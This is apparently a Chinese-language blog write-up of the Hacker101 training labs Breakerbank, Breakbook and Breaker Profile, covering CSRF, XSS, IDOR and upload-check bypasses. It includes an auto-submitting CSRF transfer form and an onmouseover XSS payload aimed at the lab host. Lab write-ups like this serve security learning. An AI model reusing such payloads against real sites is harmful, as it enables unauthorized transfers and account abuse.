0xff 简介
国外知名漏洞平台HackerOne刚刚上线了一个在线web安全学习网站hacker101,课程比较基础,内容很全面。当然,我感兴趣的还是最后的9个课程作业 :)
0x00 Level 0: Breakerbank
In this exercise, you’re presented with a bank account interface. There are many instances of the bugs we’ve discussed so far, along with some that we haven’t yet talked about.
Hint: A logic flaw in the application will give you a sample report for one of the bugs, giving you a nice template to work from.
先看一下源码,提示了我们共有4个漏洞
In this level, there are 4 vulnerabilities, falling into the following classes:
CSRF
Reflected XSS
Authorization Bypass/Direct Object Reference
Have fun!
转账操作直接由html中的post请求提交,可以在本地构造请求
<body onload="javascript:csrf()"></body>
<script type="text/javascript">
function csrf(){
document.getElementById("button").click();
}
</script>
<form action="https://levels-a.hacker101.com/levels/0/" method="POST">
<input type="input" name="from" value="1">
<input type="input" name="to" value="588">
<input type="input" name="amount" value="1000000">
<input id="button" type="submit" value="Transfer" >
</form>
<li>权限绕过</li>
表单中自己创建一个from字段,就可以自定义转账的发起人
和CSRF结合起来的效果
0x01 Level 1: Breakbook
In this exercise, you’re presented with a simple social network. There are many instances of the bugs we’ve discussed so far, along with some that we haven’t yet talked about.
Hint: Pay attention to the first message posted.
去发现社交网络里的漏洞吧
还是先看源码,还是四个漏洞
In this level, there are 4 vulnerabilities, falling into the following classes:
CSRF
Stored XSS
Forced Browsing
Have fun!
第一眼看上去就知道肯定会在输入框那里,不过又给出了说明html不被允许,但链接可以点击
通过构造一个网址,会自动生成相应的标签,可以注入XSS>标签,可以注入XSS
<tr>
<td><img src="/favicon.png" width="64" height="64"></td>
<td>qq3039344</td>
<td><a href="http://test.com/"/onmouseover="alert(1)">http://test.com/"/onmouseover="alert(1)</a></td>
<td><a href="post?id=247">Permalink</a></td>
</tr>
自己的留言链接为https://levels-a.hacker101.com/levels/1/post?id=247
通过改变id的值可以看到别人的留言
我在做这一题时感觉有一点小问题,此题中有csrf token应该不存在csrf漏洞,但是生成token的算法过于简单—MD5(),可以轻松构造token所以依然存在csrf。不过,不管我把token换成谁的,只要是32位hash都显示是我自己发的,其他的则显示bad token无法发送。
此处存疑,不知道是题目出错了,还是我思路有问题。
0x02 Level 2: Breaker Profile
In this exercise, you’re presented with a profile management and viewing interface. There are many instances of the bugs we’ve discussed so far, along with some that we haven’t yet talked about.
Hint: Think about what we learned about special handling with respect to XSS.
档案管理
有整整七个漏洞In this level, there are 7 vulnerabilities, falling into the following classes:
Stored XSS
Reflected XSS
Unrelated Bonus
Have fun!
头像处,加上.jpg后缀绕过图片检测
字体颜色处,随意修改
崩溃了…哪来7个漏洞,还有那什么Unrelated Bonus是什么意思??? :(